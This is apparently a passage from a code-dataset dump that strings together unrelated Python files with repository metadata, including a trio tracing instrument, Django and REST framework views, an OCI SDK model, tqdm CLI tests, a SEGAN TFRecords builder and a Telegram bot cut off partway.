k = m['Iptc.Application2.Keywords']
delete_tags(m, 'Iptc.Application2.Keywords')
print("Deleting tags")
m.write()
return 0
except KeyError:
# there are already no tags, skip...
print(("%s has no tags, nothing to delete" % options.image))
return 0
if not options.tags:
# without tags given perhaps the user wants just see the already
# presents tags (if any)
try:
k = m['Iptc.Application2.Keywords']
print(("%s is already tagged with %s " % (options.image, k.value)))
return 0
except:
print(("%s has no tags set" % options.image))
return 0
else:
try:
k = m['Iptc.Application2.Keywords']
if options.force:
# Force switch enabled, write tags without questions
write_tags(m, 'Iptc.Application2.Keywords', options.tags)
else:
print("There are already these tags present:\n")
for t in k.value:
print(t)
s = input("\nDo you want to overwrite them with %s ? [y/n] " % options.tags)
if s == 'y' or s == 'Y':
print("Writing tags")
write_tags(m, 'Iptc.Application2.Keywords', options.tags)
else:
print("Exiting...")
sys.exit(0)
except KeyError:
# there is no previously set tag with this name, pyexiv2 throws KeyError
print("Writing tags")
write_tags(m, 'Iptc.Application2.Keywords', options.tags)
else:
print("No image given")
if __name__ == '__main__':
status = main()
sys.exit(status)
| 2.34375 | 2 |
notes-to-self/trace.py | guilledk/trio | 4,681 | 17617 | import trio
import os
import json
from itertools import count
# Experiment with generating Chrome Event Trace format, which can be browsed
# through chrome://tracing or other mechanisms.
#
# Screenshot: https://files.gitter.im/python-trio/general/fp6w/image.png
#
# Trace format docs: https://docs.google.com/document/d/1CvAClvFfyA5R-PhYUmn5OOQtYMH4h6I0nSsKchNAySU/preview#
#
# Things learned so far:
# - I don't understand how the ph="s"/ph="f" flow events work – I think
# they're supposed to show up as arrows, and I'm emitting them between tasks
# that wake each other up, but they're not showing up.
# - I think writing out json synchronously from each event is creating gaps in
# the trace; maybe better to batch them up to write up all at once at the
# end
# - including tracebacks would be cool
# - there doesn't seem to be any good way to group together tasks based on
# nurseries. this really limits the value of this particular trace
# format+viewer for us. (also maybe we should have an instrumentation event
# when a nursery is opened/closed?)
# - task._counter should maybe be public
# - I don't know how to best show task lifetime, scheduling times, and what
# the task is actually doing on the same plot. if we want to show particular
# events like "called stream.send_all", then the chrome trace format won't
# let us also show "task is running", because neither kind of event is
# strictly nested inside the other
class Trace(trio.abc.Instrument):
def __init__(self, out):
self.out = out
self.out.write("[\n")
self.ids = count()
self._task_metadata(-1, "I/O manager")
def _write(self, **ev):
ev.setdefault("pid", os.getpid())
if ev["ph"] != "M":
ev.setdefault("ts", trio.current_time() * 1e6)
self.out.write(json.dumps(ev))
self.out.write(",\n")
def _task_metadata(self, tid, name):
self._write(
name="thread_name",
ph="M",
tid=tid,
args={"name": name},
)
self._write(
name="thread_sort_index",
ph="M",
tid=tid,
args={"sort_index": tid},
)
def task_spawned(self, task):
self._task_metadata(task._counter, task.name)
self._write(
name="task lifetime",
ph="B",
tid=task._counter,
)
def task_exited(self, task):
self._write(
name="task lifetime",
ph="E",
tid=task._counter,
)
def before_task_step(self, task):
self._write(
name="running",
ph="B",
tid=task._counter,
)
def after_task_step(self, task):
self._write(
name="running",
ph="E",
tid=task._counter,
)
def task_scheduled(self, task):
try:
waker = trio.lowlevel.current_task()
except RuntimeError:
pass
else:
id = next(self.ids)
self._write(
ph="s",
cat="wakeup",
id=id,
tid=waker._counter,
)
self._write(
cat="wakeup",
ph="f",
id=id,
tid=task._counter,
)
def before_io_wait(self, timeout):
self._write(
name=f"I/O wait",
ph="B",
tid=-1,
)
def after_io_wait(self, timeout):
self._write(
name=f"I/O wait",
ph="E",
tid=-1,
)
async def child1():
print(" child1: started! sleeping now...")
await trio.sleep(1)
print(" child1: exiting!")
async def child2():
print(" child2: started! sleeping now...")
await trio.sleep(1)
print(" child2: exiting!")
async def parent():
print("parent: started!")
async with trio.open_nursery() as nursery:
print("parent: spawning child1...")
nursery.start_soon(child1)
print("parent: spawning child2...")
nursery.start_soon(child2)
print("parent: waiting for children to finish...")
# -- we exit the nursery block here --
print("parent: all done!")
t = Trace(open("/tmp/t.json", "w"))
trio.run(parent, instruments=[t])
| 2.609375 | 3 |
common/data_refinery_common/models/__init__.py | dongbohu/ccdl_test | 0 | 17618 | <reponame>dongbohu/ccdl_test
from data_refinery_common.models.surveys import SurveyJob, SurveyJobKeyValue
from data_refinery_common.models.batches import (
BatchStatuses,
Batch,
BatchKeyValue,
File
)
from data_refinery_common.models.jobs import (
WorkerJob,
DownloaderJob,
ProcessorJob
)
from data_refinery_common.models.organism import Organism
| 1.109375 | 1 |
src/client_sample.py | ryoutoku/gunicorn-soap | 0 | 17619 | from zeep import Client
from models import RequestParameter
class Caller:
def __init__(self):
wsdl_url = "http://0.0.0.0:8080/?wsdl"
self._name = "dummy_name"
self._times = 3
self._client = Client(wsdl_url)
def call_say_hello_1(self):
result = self._client.service.say_hello_1(
self._name,
self._times)
print(result)
def call_say_hello_2(self):
result = self._client.service.say_hello_2(
{
"name": self._name,
"times": self._times
}
)
print(result)
def call_say_hello_3(self):
param = RequestParameter(
name=self._name,
times=self._times
)
result = self._client.service.say_hello_3(param.as_dict())
print(result)
print(type(result))
def main():
caller = Caller()
caller.call_say_hello_1()
print("=====================")
caller.call_say_hello_2()
print("=====================")
caller.call_say_hello_3()
print("=====================")
if __name__ == '__main__':
main()
| 2.890625 | 3 |
rest_api/views.py | vikash98k/django-rest-api | 1 | 17620 | <filename>rest_api/views.py
from rest_framework import generics
from .permissions import IsOwner
from .serializers import BucketlistSerializer, UserSerializer
from .models import Bucketlist
from django.contrib.auth.models import User
from rest_framework.permissions import IsAuthenticated
from rest_framework.authentication import SessionAuthentication
class CreateView(generics.ListCreateAPIView):
"""This class handles the GET and POSt requests of our rest api."""
queryset = Bucketlist.objects.all()
serializer_class = BucketlistSerializer
permission_classes = [IsAuthenticated]
authentication_classes = [SessionAuthentication]
def perform_create(self, serializer):
"""Save the post data when creating a new bucketlist."""
serializer.save(owner=self.request.user)
class DetailsView(generics.RetrieveUpdateDestroyAPIView):
"""This class handles GET, PUT, PATCH and DELETE requests."""
queryset = Bucketlist.objects.all()
serializer_class = BucketlistSerializer
permission_classes = [IsAuthenticated]
authentication_classes = [SessionAuthentication]
class UserView(generics.ListAPIView):
"""View to list the user queryset."""
queryset = User.objects.all()
serializer_class = UserSerializer
permission_classes = [IsAuthenticated]
authentication_classes = [SessionAuthentication]
class UserDetailsView(generics.RetrieveAPIView):
"""View to retrieve a user instance."""
queryset = User.objects.all()
serializer_class = UserSerializer
permission_classes = [IsAuthenticated]
authentication_classes = [SessionAuthentication]
| 2.234375 | 2 |
darling_ansible/python_venv/lib/python3.7/site-packages/oci/core/models/create_ip_sec_tunnel_bgp_session_details.py | revnav/sandbox | 0 | 17621 | # coding: utf-8
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateIPSecTunnelBgpSessionDetails(object):
"""
CreateIPSecTunnelBgpSessionDetails model.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateIPSecTunnelBgpSessionDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param oracle_interface_ip:
The value to assign to the oracle_interface_ip property of this CreateIPSecTunnelBgpSessionDetails.
:type oracle_interface_ip: str
:param customer_interface_ip:
The value to assign to the customer_interface_ip property of this CreateIPSecTunnelBgpSessionDetails.
:type customer_interface_ip: str
:param customer_bgp_asn:
The value to assign to the customer_bgp_asn property of this CreateIPSecTunnelBgpSessionDetails.
:type customer_bgp_asn: str
"""
self.swagger_types = {
'oracle_interface_ip': 'str',
'customer_interface_ip': 'str',
'customer_bgp_asn': 'str'
}
self.attribute_map = {
'oracle_interface_ip': 'oracleInterfaceIp',
'customer_interface_ip': 'customerInterfaceIp',
'customer_bgp_asn': 'customerBgpAsn'
}
self._oracle_interface_ip = None
self._customer_interface_ip = None
self._customer_bgp_asn = None
@property
def oracle_interface_ip(self):
"""
Gets the oracle_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
The IP address for the Oracle end of the inside tunnel interface.
If the tunnel's `routing` attribute is set to `BGP`
(see :class:`IPSecConnectionTunnel`), this IP address
is required and used for the tunnel's BGP session.
If `routing` is instead set to `STATIC`, this IP address is optional. You can set this IP
address to troubleshoot or monitor the tunnel.
The value must be a /30 or /31.
Example: `10.0.0.4/31`
:return: The oracle_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
:rtype: str
"""
return self._oracle_interface_ip
@oracle_interface_ip.setter
def oracle_interface_ip(self, oracle_interface_ip):
"""
Sets the oracle_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
The IP address for the Oracle end of the inside tunnel interface.
If the tunnel's `routing` attribute is set to `BGP`
(see :class:`IPSecConnectionTunnel`), this IP address
is required and used for the tunnel's BGP session.
If `routing` is instead set to `STATIC`, this IP address is optional. You can set this IP
address to troubleshoot or monitor the tunnel.
The value must be a /30 or /31.
Example: `10.0.0.4/31`
:param oracle_interface_ip: The oracle_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
:type: str
"""
self._oracle_interface_ip = oracle_interface_ip
@property
def customer_interface_ip(self):
"""
Gets the customer_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
The IP address for the CPE end of the inside tunnel interface.
If the tunnel's `routing` attribute is set to `BGP`
(see :class:`IPSecConnectionTunnel`), this IP address
is required and used for the tunnel's BGP session.
If `routing` is instead set to `STATIC`, this IP address is optional. You can set this IP
address to troubleshoot or monitor the tunnel.
The value must be a /30 or /31.
Example: `10.0.0.5/31`
:return: The customer_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
:rtype: str
"""
return self._customer_interface_ip
@customer_interface_ip.setter
def customer_interface_ip(self, customer_interface_ip):
"""
Sets the customer_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
The IP address for the CPE end of the inside tunnel interface.
If the tunnel's `routing` attribute is set to `BGP`
(see :class:`IPSecConnectionTunnel`), this IP address
is required and used for the tunnel's BGP session.
If `routing` is instead set to `STATIC`, this IP address is optional. You can set this IP
address to troubleshoot or monitor the tunnel.
The value must be a /30 or /31.
Example: `10.0.0.5/31`
:param customer_interface_ip: The customer_interface_ip of this CreateIPSecTunnelBgpSessionDetails.
:type: str
"""
self._customer_interface_ip = customer_interface_ip
@property
def customer_bgp_asn(self):
"""
Gets the customer_bgp_asn of this CreateIPSecTunnelBgpSessionDetails.
If the tunnel's `routing` attribute is set to `BGP`
(see :class:`IPSecConnectionTunnel`), this ASN
is required and used for the tunnel's BGP session. This is the ASN of the network on the
CPE end of the BGP session. Can be a 2-byte or 4-byte ASN. Uses \"asplain\" format.
If the tunnel's `routing` attribute is set to `STATIC`, the `customerBgpAsn` must be null.
Example: `12345` (2-byte) or `1587232876` (4-byte)
:return: The customer_bgp_asn of this CreateIPSecTunnelBgpSessionDetails.
:rtype: str
"""
return self._customer_bgp_asn
@customer_bgp_asn.setter
def customer_bgp_asn(self, customer_bgp_asn):
"""
Sets the customer_bgp_asn of this CreateIPSecTunnelBgpSessionDetails.
If the tunnel's `routing` attribute is set to `BGP`
(see :class:`IPSecConnectionTunnel`), this ASN
is required and used for the tunnel's BGP session. This is the ASN of the network on the
CPE end of the BGP session. Can be a 2-byte or 4-byte ASN. Uses \"asplain\" format.
If the tunnel's `routing` attribute is set to `STATIC`, the `customerBgpAsn` must be null.
Example: `12345` (2-byte) or `1587232876` (4-byte)
:param customer_bgp_asn: The customer_bgp_asn of this CreateIPSecTunnelBgpSessionDetails.
:type: str
"""
self._customer_bgp_asn = customer_bgp_asn
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 2.015625 | 2 |
server_django/prikmeter/views.py | ttencate/smartmetertap | 1 | 17622 | <filename>server_django/prikmeter/views.py<gh_stars>1-10
from django.contrib import auth, messages
from django.shortcuts import redirect, render
from django.views.decorators.http import require_POST, require_safe
@require_safe
def index(request):
context = {}
return render(request, 'prikmeter/index.html', context)
@require_POST
def login(request):
email = request.POST['email']
password = request.POST['password']
user = auth.authenticate(request, email=email, password=password)
if user:
auth.login(request, user)
else:
messages.error(request, 'Invalid username or password.')
return redirect(request.POST['next'] or 'prikmeter:index')
@require_POST
def logout(request):
auth.logout()
return redirect(request.POST['next'] or 'prikmeter:index')
| 2.109375 | 2 |
scenarios/order_show/executable.py | trenton42/txbalanced | 0 | 17623 | import balanced
balanced.configure('ak-test-1o9QKwUCrwstHW<KEY>')
order = balanced.Order.fetch('/orders/OR7qAh5x1cFzX0U9hD628LPa') | 1.414063 | 1 |
python/array/leetcode/move_zero.py | googege/algo-learn | 153 | 17624 | <reponame>googege/algo-learn<filename>python/array/leetcode/move_zero.py
from typing import List
# 移动零
class Solution:
# 新开一个数组
def moveZeroes1(self, nums: List[int]) -> None:
temp, k = [0] * len(nums), 0
for n in nums:
if n != 0:
temp[k] = n
k += 1
nums[:] = temp[:]
# 双指针解法
def moveZeroes2(self, nums: List[int]) -> None:
k = 0
for i, v in enumerate(nums):
if v != 0:
nums[i], nums[k] = nums[k], nums[i]
k += 1
| 3.59375 | 4 |
make_tfrecords.py | ssarfjoo/improvedsegan | 36 | 17625 | from __future__ import print_function
import tensorflow as tf
import numpy as np
from collections import namedtuple, OrderedDict
from subprocess import call
import scipy.io.wavfile as wavfile
import argparse
import codecs
import timeit
import struct
import toml
import re
import sys
import os
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def slice_signal(signal, window_size, stride=0.5):
""" Return windows of the given signal by sweeping in stride fractions
of window
"""
assert signal.ndim == 1, signal.ndim
n_samples = signal.shape[0]
offset = int(window_size * stride)
slices = []
for beg_i, end_i in zip(range(0, n_samples, offset),
range(window_size, n_samples + offset,
offset)):
if end_i - beg_i < window_size:
break
slice_ = signal[beg_i:end_i]
if slice_.shape[0] == window_size:
slices.append(slice_)
return np.array(slices, dtype=np.int32)
def read_and_slice(filename, wav_canvas_size, stride=0.5):
fm, wav_data = wavfile.read(filename)
if fm != 16000:
raise ValueError('Sampling rate is expected to be 16kHz!')
signals = slice_signal(wav_data, wav_canvas_size, stride)
return signals
def encoder_proc(wav_filename, noisy_path, out_file, wav_canvas_size, baseline_dir=None):
""" Read and slice the wav and noisy files and write to TFRecords.
out_file: TFRecordWriter.
"""
ppath, wav_fullname = os.path.split(wav_filename)
noisy_filename = os.path.join(noisy_path, wav_fullname)
wav_signals = read_and_slice(wav_filename, wav_canvas_size)
noisy_signals = read_and_slice(noisy_filename, wav_canvas_size)
if not baseline_dir is None:
baseline_filename = os.path.join(baseline_dir, wav_fullname)
baseline_signals = read_and_slice(baseline_filename, wav_canvas_size)
assert wav_signals.shape == noisy_signals.shape, noisy_signals.shape
if baseline_dir is None:
for (wav, noisy) in zip(wav_signals, noisy_signals):
wav_raw = wav.tostring()
noisy_raw = noisy.tostring()
example = tf.train.Example(features=tf.train.Features(feature={
'wav_raw': _bytes_feature(wav_raw),
'noisy_raw': _bytes_feature(noisy_raw)}))
out_file.write(example.SerializeToString())
else:
for (wav, noisy, base) in zip(wav_signals, noisy_signals, baseline_signals):
wav_raw = wav.tostring()
noisy_raw = noisy.tostring()
baseline_raw = base.tostring()
example = tf.train.Example(features=tf.train.Features(feature={
'wav_raw': _bytes_feature(wav_raw),
'noisy_raw': _bytes_feature(noisy_raw),
'baseline_raw': _bytes_feature(baseline_raw)
}))
out_file.write(example.SerializeToString())
def main(opts):
if not os.path.exists(opts.save_path):
# make save path if it does not exist
os.makedirs(opts.save_path)
# set up the output filepath
out_filepath = os.path.join(opts.save_path, opts.out_file)
if os.path.splitext(out_filepath)[1] != '.tfrecords':
# if wrong extension or no extension appended, put .tfrecords
out_filepath += '.tfrecords'
else:
out_filename, ext = os.path.splitext(out_filepath)
out_filepath = out_filename + ext
# check if out_file exists and if force flag is set
if os.path.exists(out_filepath) and not opts.force_gen:
raise ValueError('ERROR: {} already exists. Set force flag (--force-gen) to '
'overwrite. Skipping this speaker.'.format(out_filepath))
elif os.path.exists(out_filepath) and opts.force_gen:
print('Will overwrite previously existing tfrecords')
os.unlink(out_filepath)
with open(opts.cfg) as cfh:
# read the configuration description
cfg_desc = toml.loads(cfh.read())
beg_enc_t = timeit.default_timer()
out_file = tf.python_io.TFRecordWriter(out_filepath)
# process the acoustic and textual data now
for dset_i, (dset, dset_desc) in enumerate(cfg_desc.iteritems()):
print('-' * 50)
wav_dir = dset_desc['clean']
wav_files = [os.path.join(wav_dir, wav) for wav in
os.listdir(wav_dir) if wav.endswith('.wav')]
noisy_dir = dset_desc['noisy']
baseline_dir = None
if 'baseline' in dset_desc.keys():
baseline_dir = dset_desc['baseline']
nfiles = len(wav_files)
for m, wav_file in enumerate(wav_files):
print('Processing wav file {}/{} {}{}'.format(m + 1,
nfiles,
wav_file,
' ' * 10),
end='\r')
sys.stdout.flush()
encoder_proc(wav_file, noisy_dir, out_file, 2 ** 14, baseline_dir)
out_file.close()
end_enc_t = timeit.default_timer() - beg_enc_t
print('')
print('*' * 50)
print('Total processing and writing time: {} s'.format(end_enc_t))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert the set of txt and '
'wavs to TFRecords')
parser.add_argument('--cfg', type=str, default='cfg/e2e_maker.cfg',
help='File containing the description of datasets '
'to extract the info to make the TFRecords.')
parser.add_argument('--save_path', type=str, default='data/',
help='Path to save the dataset')
parser.add_argument('--out_file', type=str, default='segan.tfrecords',
help='Output filename')
parser.add_argument('--force-gen', dest='force_gen', action='store_true',
help='Flag to force overwriting existing dataset.')
parser.set_defaults(force_gen=False)
opts = parser.parse_args()
main(opts)
| 2.296875 | 2 |
software.py | schamberg97/bullshitMgimoProj | 0 | 17626 | <reponame>schamberg97/bullshitMgimoProj
from myShop import MyShop
from myBot import MYBOT
from sMenu import Menu
class software:
@staticmethod
def runShowTables():
#подключаем библиотеку
import xml.dom.minidom as minidom
from sMenu import Menu
#читаем XML из файла
dom = minidom.parse("myShop.xml")
dom.normalize()
#Читаем таблицу
def listTable(what,whatSub):
pars=dom.getElementsByTagName(what)[0]
#Читаем элементы таблицы Materials
nodes=pars.getElementsByTagName(whatSub)
#Выводим элементы таблицы на экран
for node in nodes:
id = node.getElementsByTagName("id")[0]
name = node.getElementsByTagName("name")[0]
print(id.firstChild.data, name.firstChild.data)
menu_items=["Категории", "Цвета", "Адреса", "Материал", "Сезон", "Товар"]
menu_actions=['categories','colors', 'cities', 'materials', 'seasons', 'products'] # Базу клиентов и заказов не предлагаем ;)
menu_actions_nodes=['category','color', 'city', 'material', 'season', 'product']
menu_title="Смотреть таблицу"
my_menu=Menu(menu_title, menu_items)
choice=my_menu.get_user_choice()
listTable(menu_actions[choice-1], menu_actions_nodes[choice-1])
@staticmethod
def run():
#Создаем магазин товаров
myShop=MyShop("myShop.xml")
#myShop.printProduct()
#Добавляем тестовые данные
myShop.addSampleData(30, 30, 500)
#myShop.printProduct()
myShop.saveXML("new.xml")
#Создаем бота
bot=MYBOT(myShop)
#обучаем бота
bot.botTraining(0)
#получаем данные от пользователя
print('Для выхода - нажмите Ctrl-C')
sd=bot.getUserChoice()
#строим рекомендацию и выводим рекомендованный товар
print("Ваш рекомендованный товар: ",bot.getPrecigion(sd)) | 2.71875 | 3 |
examples/basic.py | EmbarkStudios/Python-xNormal | 52 | 17627 | import xNormal
xNormal.run("piano_high.obj", "piano_low.obj", "piano.png", width=256, height=256, gen_normals = True, gen_ao = True) | 1.867188 | 2 |
jina/executors/evaluators/rank/recall.py | yk/jina | 0 | 17628 | <reponame>yk/jina
from typing import Sequence, Any, Optional
from . import BaseRankingEvaluator
class RecallEvaluator(BaseRankingEvaluator):
"""A :class:`RecallEvaluator` evaluates the Precision of the search.
It computes how many of the first given `eval_at` groundtruth are found in the matches
"""
metric = 'Recall@N'
def __init__(self,
eval_at: Optional[int] = None,
*args, **kwargs):
""""
:param eval_at: the point at which evaluation is computed, if None give, will consider all the input to evaluate
"""
super().__init__(*args, **kwargs)
self.eval_at = eval_at
def evaluate(self, actual: Sequence[Any], desired: Sequence[Any], *args, **kwargs) -> float:
""""
:param actual: the matched document identifiers from the request as matched by jina indexers and rankers
:param desired: the expected documents matches ids sorted as they are expected
:return the evaluation metric value for the request document
"""
if self.eval_at == 0:
return 0.0
actual_at_k = actual[:self.eval_at] if self.eval_at else actual
ret = len(set(actual_at_k).intersection(set(desired)))
return ret / len(desired)
| 2.78125 | 3 |
tests/tests_main.py | insilications/tqdm-clr | 22,617 | 17629 | <filename>tests/tests_main.py
"""Test CLI usage."""
import logging
import subprocess # nosec
import sys
from functools import wraps
from os import linesep
from tqdm.cli import TqdmKeyError, TqdmTypeError, main
from tqdm.utils import IS_WIN
from .tests_tqdm import BytesIO, _range, closing, mark, raises
def restore_sys(func):
"""Decorates `func(capsysbin)` to save & restore `sys.(stdin|argv)`."""
@wraps(func)
def inner(capsysbin):
"""function requiring capsysbin which may alter `sys.(stdin|argv)`"""
_SYS = sys.stdin, sys.argv
try:
res = func(capsysbin)
finally:
sys.stdin, sys.argv = _SYS
return res
return inner
def norm(bytestr):
"""Normalise line endings."""
return bytestr if linesep == "\n" else bytestr.replace(linesep.encode(), b"\n")
@mark.slow
def test_pipes():
"""Test command line pipes"""
ls_out = subprocess.check_output(['ls']) # nosec
ls = subprocess.Popen(['ls'], stdout=subprocess.PIPE) # nosec
res = subprocess.Popen( # nosec
[sys.executable, '-c', 'from tqdm.cli import main; main()'],
stdin=ls.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = res.communicate()
assert ls.poll() == 0
# actual test:
assert norm(ls_out) == norm(out)
assert b"it/s" in err
if sys.version_info[:2] >= (3, 8):
test_pipes = mark.filterwarnings("ignore:unclosed file:ResourceWarning")(
test_pipes)
def test_main_import():
"""Test main CLI import"""
N = 123
_SYS = sys.stdin, sys.argv
# test direct import
sys.stdin = [str(i).encode() for i in _range(N)]
sys.argv = ['', '--desc', 'Test CLI import',
'--ascii', 'True', '--unit_scale', 'True']
try:
import tqdm.__main__ # NOQA, pylint: disable=unused-variable
finally:
sys.stdin, sys.argv = _SYS
@restore_sys
def test_main_bytes(capsysbin):
"""Test CLI --bytes"""
N = 123
# test --delim
IN_DATA = '\0'.join(map(str, _range(N))).encode()
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA)
# sys.stdin.write(b'\xff') # TODO
sys.stdin.seek(0)
main(sys.stderr, ['--desc', 'Test CLI delim', '--ascii', 'True',
'--delim', r'\0', '--buf_size', '64'])
out, err = capsysbin.readouterr()
assert out == IN_DATA
assert str(N) + "it" in err.decode("U8")
# test --bytes
IN_DATA = IN_DATA.replace(b'\0', b'\n')
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA)
sys.stdin.seek(0)
main(sys.stderr, ['--ascii', '--bytes=True', '--unit_scale', 'False'])
out, err = capsysbin.readouterr()
assert out == IN_DATA
assert str(len(IN_DATA)) + "B" in err.decode("U8")
@mark.skipif(sys.version_info[0] == 2, reason="no caplog on py2")
def test_main_log(capsysbin, caplog):
"""Test CLI --log"""
_SYS = sys.stdin, sys.argv
N = 123
sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
try:
with caplog.at_level(logging.INFO):
main(sys.stderr, ['--log', 'INFO'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert not caplog.record_tuples
with caplog.at_level(logging.DEBUG):
main(sys.stderr, ['--log', 'DEBUG'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert caplog.record_tuples
finally:
sys.stdin, sys.argv = _SYS
@restore_sys
def test_main(capsysbin):
"""Test misc CLI options"""
N = 123
sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
# test --tee
main(sys.stderr, ['--mininterval', '0', '--miniters', '1'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
assert N <= len(err.split(b"\r")) < N + 5
len_err = len(err)
main(sys.stderr, ['--tee', '--mininterval', '0', '--miniters', '1'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA and b"123/123" in err
# spaces to clear intermediate lines could increase length
assert len_err + len(norm(out)) <= len(err)
# test --null
main(sys.stderr, ['--null'])
out, err = capsysbin.readouterr()
assert not out and b"123/123" in err
# test integer --update
main(sys.stderr, ['--update'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum formula"
# test integer --update_to
main(sys.stderr, ['--update-to'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str(N - 1) + "it").encode() in err
assert (str(N) + "it").encode() not in err
with closing(BytesIO()) as sys.stdin:
sys.stdin.write(IN_DATA.replace(b'\n', b'D'))
# test integer --update --delim
sys.stdin.seek(0)
main(sys.stderr, ['--update', '--delim', 'D'])
out, err = capsysbin.readouterr()
assert out == IN_DATA.replace(b'\n', b'D')
assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum"
# test integer --update_to --delim
sys.stdin.seek(0)
main(sys.stderr, ['--update-to', '--delim', 'D'])
out, err = capsysbin.readouterr()
assert out == IN_DATA.replace(b'\n', b'D')
assert (str(N - 1) + "it").encode() in err
assert (str(N) + "it").encode() not in err
# test float --update_to
sys.stdin = [(str(i / 2.0) + '\n').encode() for i in _range(N)]
IN_DATA = b''.join(sys.stdin)
main(sys.stderr, ['--update-to'])
out, err = capsysbin.readouterr()
assert norm(out) == IN_DATA
assert (str((N - 1) / 2.0) + "it").encode() in err
assert (str(N / 2.0) + "it").encode() not in err
@mark.slow
@mark.skipif(IS_WIN, reason="no manpages on windows")
def test_manpath(tmp_path):
"""Test CLI --manpath"""
man = tmp_path / "tqdm.1"
assert not man.exists()
with raises(SystemExit):
main(argv=['--manpath', str(tmp_path)])
assert man.is_file()
@mark.slow
@mark.skipif(IS_WIN, reason="no completion on windows")
def test_comppath(tmp_path):
"""Test CLI --comppath"""
man = tmp_path / "tqdm_completion.sh"
assert not man.exists()
with raises(SystemExit):
main(argv=['--comppath', str(tmp_path)])
assert man.is_file()
# check most important options appear
script = man.read_text()
opts = {'--help', '--desc', '--total', '--leave', '--ncols', '--ascii',
'--dynamic_ncols', '--position', '--bytes', '--nrows', '--delim',
'--manpath', '--comppath'}
assert all(args in script for args in opts)
@restore_sys
def test_exceptions(capsysbin):
"""Test CLI Exceptions"""
N = 123
sys.stdin = [str(i) + '\n' for i in _range(N)]
IN_DATA = ''.join(sys.stdin).encode()
with raises(TqdmKeyError, match="bad_arg_u_ment"):
main(sys.stderr, argv=['-ascii', '-unit_scale', '--bad_arg_u_ment', 'foo'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmTypeError, match="invalid_bool_value"):
main(sys.stderr, argv=['-ascii', '-unit_scale', 'invalid_bool_value'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmTypeError, match="invalid_int_value"):
main(sys.stderr, argv=['-ascii', '--total', 'invalid_int_value'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
with raises(TqdmKeyError, match="Can only have one of --"):
main(sys.stderr, argv=['--update', '--update_to'])
out, _ = capsysbin.readouterr()
assert norm(out) == IN_DATA
# test SystemExits
for i in ('-h', '--help', '-v', '--version'):
with raises(SystemExit):
main(argv=[i])
| 2.359375 | 2 |
plugins/commands.py | Kalpesh0/Project01 | 0 | 17630 | <reponame>Kalpesh0/Project01
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @REQUEST_M0viz
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton
from script import script
@Client.on_message(filters.command(["start"]) & filters.private)
async def start(client, message):
try:
await message.reply_text(
text=script.START_MSG.format(message.from_user.mention),
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("HELP", callback_data="help_data"),
InlineKeyboardButton("ABOUT", callback_data="about_data"),
],
[
InlineKeyboardButton(
"🖤JOIN SUPPORT GROUP🖤", url="https://t.me/REQUEST_M0viz")
]
]
),
reply_to_message_id=message.message_id
)
except:
pass
@Client.on_message(filters.command(["help"]) & filters.private)
async def help(client, message):
try:
await message.reply_text(
text=script.HELP_MSG,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("BACK", callback_data="start_data"),
InlineKeyboardButton("ABOUT", callback_data="about_data"),
],
[
InlineKeyboardButton(
"💕DONATE US 💕", url="https://t.me/Harshsoni_08")
]
]
),
reply_to_message_id=message.message_id
)
except:
pass
@Client.on_message(filters.command(["about"]) & filters.private)
async def about(client, message):
try:
await message.reply_text(
text=script.ABOUT_MSG,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("BACK", callback_data="help_data"),
InlineKeyboardButton("START", callback_data="start_data"),
],
[
InlineKeyboardButton(
